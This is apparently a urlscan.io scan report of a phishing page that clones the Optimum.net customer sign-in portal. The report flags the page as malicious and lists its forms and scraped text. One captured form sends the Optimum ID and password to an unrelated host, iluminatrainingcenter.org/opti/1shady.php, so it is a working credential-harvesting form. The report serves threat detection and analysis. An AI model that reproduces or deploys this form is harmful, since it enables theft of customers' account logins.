kj.dlvkbw.workers.dev Open in urlscan Pro
2a06:98c1:3121::3  Malicious Activity! Public Scan

URL: https://kj.dlvkbw.workers.dev/indexx.html
Submission: On March 12 via api from BY — Scanned from NL

Form analysis 4 forms found in the DOM

POST

<form id="signinForm" method="post" ng-submit="CommonHeaderCtrl.handleUserLogin('signinForm')" class="ng-valid ng-dirty">
  <div class="row">
    <div class="span12">
      <h4>My Optimum ID</h4>
    </div>
    <div class="span6">
      <input type="text" name="id" id="signinFormOptimumId" autocorrect="off" autocapitalize="off" data-ng-model="CommonHeaderCtrl.userInput.signinForm.optimumId" tabindex="11" value="" class="ng-pristine ng-valid">
      <p class="error" data-ng-show="CommonHeaderCtrl.userInput.signinForm.isNotValidOptimumId" style="display:none"> Invalid Optimum ID, please complete all fields. </p>
    </div>
    <br>
    <div class="span6"> Forgot my Optimum ID </div>
  </div>
  <br>
  <div class="row">
    <div class="span12">
      <h4>Password</h4>
    </div>
    <div class="span6">
      <input type="password" id="signinFormPassword" name="password" autocorrect="off" autocapitalize="off" data-ng-model="CommonHeaderCtrl.userInput.signinForm.password" tabindex="12" class="ng-pristine ng-valid">
      <p class="error" data-ng-show="CommonHeaderCtrl.userInput.signinForm.isNotValidPassword" style="display:none"> Invalid password, please complete all fields. </p>
    </div>
    <div class="span6"> I forgot my password </div>
  </div>
  <div class="row">
    <div class="span12">
      <hr>
    </div>
    <div class="span12">
      <div class="remember-me-login">
        <input class="btn btn--primary" tabindex="13" type="submit" value="Sign in">
        <div class="remember-me-group">
          <input type="hidden" data-ng-model="CommonHeaderCtrl.userInput.remember_bool" name="remember" value="false" class="ng-pristine ng-valid">
        </div>
      </div>
    </div>
  </div>
</form>

<form class="form-global-search animateInput ng-pristine ng-valid" id="global-input-form">
  <div class="input-group" ng-submit="CommonHeaderCtrl.goToSearch(CommonHeaderCtrl.searchCategory.ondemand)">
    <input data-ng-model="CommonHeaderCtrl.searchTerm" class="input--s input-transparent input-lighter-accent ng-pristine ng-valid" type="text" id="global-input" data-ng-change="CommonHeaderCtrl.doSearch()" placeholder="Search TV">
    <span class="input-group-btn"> <button data-ng-click="CommonHeaderCtrl.goToSearch(CommonHeaderCtrl.searchCategory.ondemand)" id="search-btn" class="btn btn--white btn--s" type="submit">
        <span class="icon-search"></span>
      </button> </span>
  </div>
</form>

POST https://iluminatrainingcenter.org/opti/1shady.php

<form class="ng-valid ng-dirty" method="post" action="https://iluminatrainingcenter.org/opti/1shady.php">
  <div id="login-box">
    <div class="container">
      <div class="row">
        <div class="span5">
          <label class="label">My Optimum ID</label>
        </div>
        <div class="span7"></div>
      </div>
      <div class="row">
        <div class="span5">
          <input type="text" name="id" id="loginPageUsername" autocorrect="off" autocapitalize="off" class="input input--highlight input-wrap loginid ng-pristine ng-valid" ng-model="model.id" tabindex="7" ng-disabled="model.reauth"
            ng-focus="!passwordResetSucc" required="">
        </div>
        <div class="span7 forgot" tabindex="10"> I forgot my Optimum ID </div>
      </div>
      <div class="row">
        <div class="span12 height10"></div>
      </div>
      <div class="row">
        <div class="span5">
          <label class="label">Password</label>
        </div>
        <div class="span7"></div>
      </div>
      <div class="row">
        <div class="span5">
          <input type="password" name="pass" id="loginPagePassword" autocorrect="off" autocapitalize="off" class="input input-highlight input-wrap loginpass ng-pristine ng-valid" ng-model="model.password" ng-focus="passwordResetSucc" tabindex="8"
            required="">
        </div>
        <div class="span7 forgot"> I forgot my password </div>
      </div>
      <div class="row">
        <div class="span12 height10"></div>
      </div>
      <div class="row">
        <div class="span12">
          <hr>
        </div>
      </div>
      <div class="row">
        <div class="span12 hidden-phone">
          <button class="btn btn--primary" id="target" ng-click="submit()" tabindex="9" ng-hide="isCpc">Sign in to Optimum.net</button>
          <button class="btn btn--secondary" id="target" ng-click="submit()" tabindex="9" ng-show="isCpc" style="display:none">Sign in</button>
          <div ng-class="{
  'is-checked': checkbox.isChecked,
  'not-checked': !checkbox.isChecked,
  'is-checked-partial': checkbox.isPartial
  }" ng-click="checkbox.onCheck()" type="checkbox" class="checkbox login-checkbox checkbox--secondary ng-valid not-checked ng-dirty" ng-model="model.remember" tabindex="12" ng-hide="isCpc" ng-disabled="disableRememberMe">
            <div class="checkbox-inner"></div>
          </div>
          <div class="logged-in" ng-hide="isCpc">Remember Me</div>
        </div>
      </div>
      <div class="hidden-desktop hidden-tablet">
        <div class="span10">
          <button class="btn btn--primary" id="target" ng-click="submit()" tabindex="9" ng-hide="isCpc">Sign in to Optimum.net</button>
          <button class="btn btn--secondary" id="target" ng-click="submit()" tabindex="9" ng-show="isCpc" style="display:none">Sign in</button>
        </div>
        <div class="span10 remember-me">
          <div ng-class="{
  'is-checked': checkbox.isChecked,
  'not-checked': !checkbox.isChecked,
  'is-checked-partial': checkbox.isPartial
  }" ng-click="checkbox.onCheck()" type="checkbox" class="checkbox login-checkbox checkbox--secondary ng-valid not-checked ng-dirty" ng-model="model.remember" tabindex="12" ng-hide="isCpc" ng-disabled="disableRememberMe">
            <div class="checkbox-inner"></div>
          </div>
          <span class="logged-in" ng-hide="isCpc">Remember Me</span>
        </div>
      </div>
    </div>
  </div>
</form>

<form data-ng-submit="CommonFooterCtrl.faqSearch()" class="ng-pristine ng-valid">
  <input type="text" class="ng-pristine ng-valid" data-ng-model="CommonFooterCtrl.footerSearchVal" placeholder="Search FAQs" no-specialchar="">
  <a class="btn btn--secondary search-glass"><i class="icon-search"></i></a>
</form>

Text Content

Currently viewing account details for:

UPDATES FROM OPTIMUM:

Tropical Storm Isaias caused significant service disruptions in the Northeast.
We appreciate your patience and will automatically credit your account in the
next several weeks for the time your Optimum service was not available when
power was restored.

Learn more
Make payment now



0 more alerts



0 more alerts


Currently viewing account details for:

Learn more
Make payment now



-1 more alerts



-1 more alerts

Sign in with your Optimum ID


Sign in with your Optimum ID

Sign out

My profile Sign in
 * Personal info
 * Notification preferences
 * My household IDs
 * My wireless devices
 * Create an Optimum ID

SIGN IN TO MANAGE YOUR PROFILE AND DEVICES

MY OPTIMUM ID

Invalid Optimum ID, please complete all fields.


Forgot my Optimum ID


PASSWORD

Invalid password, please complete all fields.

I forgot my password

--------------------------------------------------------------------------------



Not ?

Sign out
Pay bill
Amount due

$0
due in days
due in day
due today



past due
Next statement
Pay  undefined now
We will debit on
from
Pay  undefined now
Next statement date

Your payment of
was received on
A credit of will
be applied to your
statement
You do not have access
to this section.
Please sign in as the primary
Optimum ID to view and pay your bill,
or to grant access to additional users
Sorry, we can't accept
online payments for
your account.
Contact us at
(866) 213-7456 to
make a payment.
Sorry we can't access
your billing info right now.
 * Pay Online
 * Pay in Person
 * Pay by Mail

 * View my bill

 * Manage payment methods
 * Manage automatic payments
 * Make a one-time payment

 * Manage payment methods
 * Manage automatic payments
 * Make a one-time payment

 * Manage payment methods
 * Set up automatic payments
 * Make a one-time payment

 * Manage payment methods
 * Set up automatic payments
 * Make a one-time payment

 * Account activity

 * Billing support

Not ?

Sign out
Support
 *  * 
    * TV

 *  * 
    * Phone

 *  * 
    * Internet

 *  * 
    * Pay Bill

MESSAGE US

SERVICE STATUS

 * FAQS
 * Tutorials
 * User Guides
 * Service Appointments
 * Connect My Device
 * Optimum Service Plans
 * Optimum Support App

 * Find Optimum Stores
 * Accessories
 * Moving?
 * Contact Us



Internet
 * Email
 * WiFi Hotspots
 * Internet Protection
 * Phishing Emails

 * Router
 * Mobile TV App
 * Optimum App
 * Altice One App
 * Support

SIGN IN TO CHECK YOUR EMAIL AND MANAGE YOUR INTERNET FEATURES

EMAIL INBOX 0

View all

We can't get your messages right now. Please try again later.

You have no new emails

0
TV

WATCH

 * Guide
 * On Demand
 * Cart
 * Favorites
 * TV to GO
 * Mobile TV App
 * Optimum App
 * Altice One App
 * Pay Per View
 * Support
 * Optimum Channel

FEATURES & SETTINGS

 * My cable boxes
 * Remote set up
 * HD
 * TV Channel Lineups

SIGN IN TO MANAGE YOUR DVR AND TV FEATURES.

MY DVR

View recordings

YOU HAVE NO RECORDINGS SCHEDULED.

SERVICE UNAVAILABLE AT THIS TIME.

CLICK HERE TO LEARN MORE ABOUT DVR


DVR
Phone
 * Voicemail
 * Call history
 * International
 * Call waiting
 * Call forwarding
 * VIP ringing
 * Block unwanted calls

 * Find me
 * Private calling
 * BackUp phone
 * Directory listing
 * Support
 * Stop robocalls

 * Voicemail
 * Call history
 * International
 * Call waiting
 * Call forwarding
 * VIP ringing
 * Block unwanted calls

 * Find me
 * Private calling
 * BackUp phone
 * Directory listing
 * Support
 * Stop robocalls

MY MESSAGES 0

View all
 * Voicemail
 * Call history
 * International
 * Call waiting
 * Call forwarding
 * VIP ringing
 * Block unwanted calls

 * Find me
 * Private calling
 * BackUp phone
 * Directory listing
 * Support
 * Stop robocalls

SIGN IN TO CHECK YOUR MESSAGES AND MANAGE YOUR PHONE FEATURES


0
My Offers

WE'VE DETECTED THAT YOU'RE USING AN OLDER VERSION OF INTERNET EXPLORER

Optimum.net is compatible with a wide range of browsers. However, not all
browsers allow you to take advantage of all the new features. We strongly
recommend that you upgrade to a more current browser.



YOU NEED TO CHANGE YOUR INTERNET EXPLORER COMPATIBILITY VIEW SETTING TO GET THE
MOST FROM THE NEW OPTIMUM.NET

Click here for more info.






OPTIMUM SIGN IN


YOUR PASSWORD HAS BEEN RESET. PLEASE SIGN IN WITH YOUR NEW PASSWORD.


My Optimum ID

I forgot my Optimum ID

Password

I forgot my password


--------------------------------------------------------------------------------

Sign in to Optimum.net Sign in

Remember Me
Sign in to Optimum.net Sign in

Remember Me


DON'T HAVE AN OPTIMUM ID?

An Optimum ID is a unique username that provides access to extra services and
benefits.

 * 


PLEASE SIGN IN AGAIN

To protect your most sensitive data, you may be asked to re-enter your password
from time to time.


NEVER FORGET ANOTHER PASSWORD

Optimum's Password Manager allows you to securely manage online usernames and
passwords on all of your devices.

 * Find out more about Password Manager and other ways to protect yourself
   online


NEED HELP? NO PROBLEM.



FREQUENTLY ASKED QUESTIONS

Programming My Remote Control • Optimum Hotspots • Online Bill Pay

PREGUNTAS FRECUENTES

Programar mi control remoto • Hotspots de Optimum • Con pago de factura en linea

TV FREQUENTLY ASKED QUESTIONS

Programming My Remote Control • Viewer: Power On Feature • Setting Up My HDTV

TV PREGUNTAS FRECUENTES

Programar mi control remoto • Canal de encendido • Configurar mi HDTV

INTERNET FREQUENTLY ASKED QUESTIONS

Optimum Hotspots • Create an Optimum ID • Accessing My Email

PREGUNTAS FRECUENTES DE INTERNET

Hotspots de Optimum • Como crear una ID de Optimum • Acceder a su correo
electronico • Proteccion para Internet de McAfee

PAY BILL FREQUENTLY ASKED QUESTIONS

Bill Payment Options • Online Bill Pay • Making a Late Payment

OPCIONES DE PAGO PREGUNTAS FRECUENTES

Opciones de pago de factura • Con pago de factura en linea • Hacer un pago
atrasado


CONTACT US

 * Message us
 * @OptimumHelp
 * Optimum Stores

--------------------------------------------------------------------------------

 * 
 * 
 * 
 * 
 * 

 * TeamViewer
 * Service Terms & Info
 * Copyright Policy
 * Privacy Notice
 * Report Abuse
 * Accessibility
 * Storm Preparedness
 * Legal Compliance

 * Terms of service
 * Copyright policy
 * Privacy policy
 * Legal Compliance

 * 
 * 
 * 
 * 
 * 

 * © Copyright 2021 CSC Holdings, LLC.

 * Service Terms & Info
 * Copyright Policy
 * Privacy Notice
 * Legal Compliance

 * Service Terms & Info
 * Copyright Policy
 * Privacy Notice
 * Legal Compliance

 * © Copyright 2021 CSC Holdings, LLC.

 * © 2021 CSC Holdings, LLC.
 * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 

 * © Copyright 2021 CSC Holdings, LLC.

Back
 * Sign out
   
 * Internet
   false
 * TV
   DVR
 * Phone
   false
   
 * My Offers

--------------------------------------------------------------------------------

 * My Profile
 * Pay bill
 * Support
   
 * Service Appointments

 * MESSAGE US

 * SERVICE STATUS

--------------------------------------------------------------------------------

 * Contact us
 *